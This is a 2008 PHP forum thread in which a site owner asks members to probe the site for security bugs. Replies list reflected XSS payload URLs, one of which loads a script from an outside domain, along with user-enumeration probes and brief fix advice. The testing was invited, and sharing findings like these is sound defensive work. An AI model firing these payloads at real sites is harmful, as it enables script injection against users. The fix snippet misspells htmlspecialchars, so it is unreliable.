amitava82 Posted February 13, 2008 Share Posted February 13, 2008 Can you guys test my site and find any security issues and bugs? Link: http://iupgbsa.info/ Demo user: demo@iupgbsa.info Pass: 123456 Thanks! Link to comment https://forums.phpfreaks.com/topic/90954-please-test-my-site/ Share on other sites More sharing options...
helraizer Posted February 14, 2008 Share Posted February 14, 2008 XSS - http://iupgbsa.info/profile.php?user=%22%3E%3Cmarquee%3E%3Ch1%3Evunerable%3C/h1%3E%3C/marquee%3E http://iupgbsa.info/profile.php?user=15%22%3E%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E - need to protect GET variables. http://iupgbsa.info/profile.php?user=15 Just to name a few Link to comment https://forums.phpfreaks.com/topic/90954-please-test-my-site/#findComment-466393 Share on other sites More sharing options...
helraizer Posted February 14, 2008 Share Posted February 14, 2008 An annoyance, more than a problem, is that during registration you ask for the user's country twice, and yet still ask for zip code. England for one doesn't use Zip codes. so how can they possibly be verified? I've registered now, it may take up to 24 to activate my account, if they'll activate it, that is. Sam Link to comment https://forums.phpfreaks.com/topic/90954-please-test-my-site/#findComment-466406 Share on other sites More sharing options...
amitava82 Posted February 14, 2008 Author Share Posted February 14, 2008 Thanks for the suggestions and finding the issues. Registration is only allowed for Graduate students. We do manual verification and then activate account. Thats why it takes 24 hours for activation. Regarding GET protection.. Can you please give me an idea how to do it? I'm just a business student.. Don't have much in depth knowledge in PHP... Can i use PHP strip_tags() function to do that? Any more issues please let me know. Thank you! Link to comment https://forums.phpfreaks.com/topic/90954-please-test-my-site/#findComment-466424 Share on other sites More sharing options...
agentsteal Posted February 14, 2008 Share Posted February 14, 2008 Array: http://www.iupgbsa.info/profile.php?user[] Cross Site Scripting: http://www.iupgbsa.info/forgotpassword.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.iupgbsa.info/index.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.iupgbsa.info/profile.php?user="><marquee><h1>vulnerable</marquee> User Enumeration: http://www.iupgbsa.info/~admin User Enumeration: http://www.iupgbsa.info/~iupgbsa User Enumeration: http://www.iupgbsa.info/~root Link to comment https://forums.phpfreaks.com/topic/90954-please-test-my-site/#findComment-466468 Share on other sites More sharing options...
helraizer Posted February 14, 2008 Share Posted February 14, 2008 Thanks for the suggestions and finding the issues. Registration is only allowed for Graduate students. We do manual verification and then activate account. Thats why it takes 24 hours for activation. Regarding GET protection.. Can you please give me an idea how to do it? I'm just a business student.. Don't have much in depth knowledge in PHP... Can i use PHP strip_tags() function to do that? Any more issues please let me know. Thank you! If you have say $user = $_GET['user']; then instead use $user = htmlspecialchcars($_GET['user']); - That'll change < or > into < or > thus rendering xss obsolete. Sam Link to comment https://forums.phpfreaks.com/topic/90954-please-test-my-site/#findComment-466754 Share on other sites More sharing options...
amitava82 Posted February 14, 2008 Author Share Posted February 14, 2008 Yes I figure that out from PHP manual and made the changes. Thanks for your help though. Also I'm receiving all kinds of attack mails in my inbox after posting my site link here. I'm wondering if anyone from here is doing that for testing purpose or its just regular spam attack.. ??? Link to comment https://forums.phpfreaks.com/topic/90954-please-test-my-site/#findComment-467074 Share on other sites More sharing options...
helraizer Posted February 14, 2008 Share Posted February 14, 2008 If you have your email openly on your site, unprotected (with @ and . rather than [at] and [dot] or similar) then it could well be a spam bot, else it could well be some one just testing it. Sam Link to comment https://forums.phpfreaks.com/topic/90954-please-test-my-site/#findComment-467158 Share on other sites More sharing options...
TheFilmGod Posted February 18, 2008 Share Posted February 18, 2008 Thanks for the suggestions and finding the issues. Registration is only allowed for Graduate students. We do manual verification and then activate account. Thats why it takes 24 hours for activation. Regarding GET protection.. Can you please give me an idea how to do it? I'm just a business student.. Don't have much in depth knowledge in PHP... Can i use PHP strip_tags() function to do that? Any more issues please let me know. Thank you! If you have say $user = $_GET['user']; then instead use $user = htmlspecialchcars($_GET['user']); - That'll change < or > into < or > thus rendering xss obsolete. Sam Use $_SESSION instead of $_GET. GET should only be used to keep track of a page url or for a search - don't use it for info related to usernames Link to comment https://forums.phpfreaks.com/topic/90954-please-test-my-site/#findComment-469286 Share on other sites More sharing options...
Recommended Posts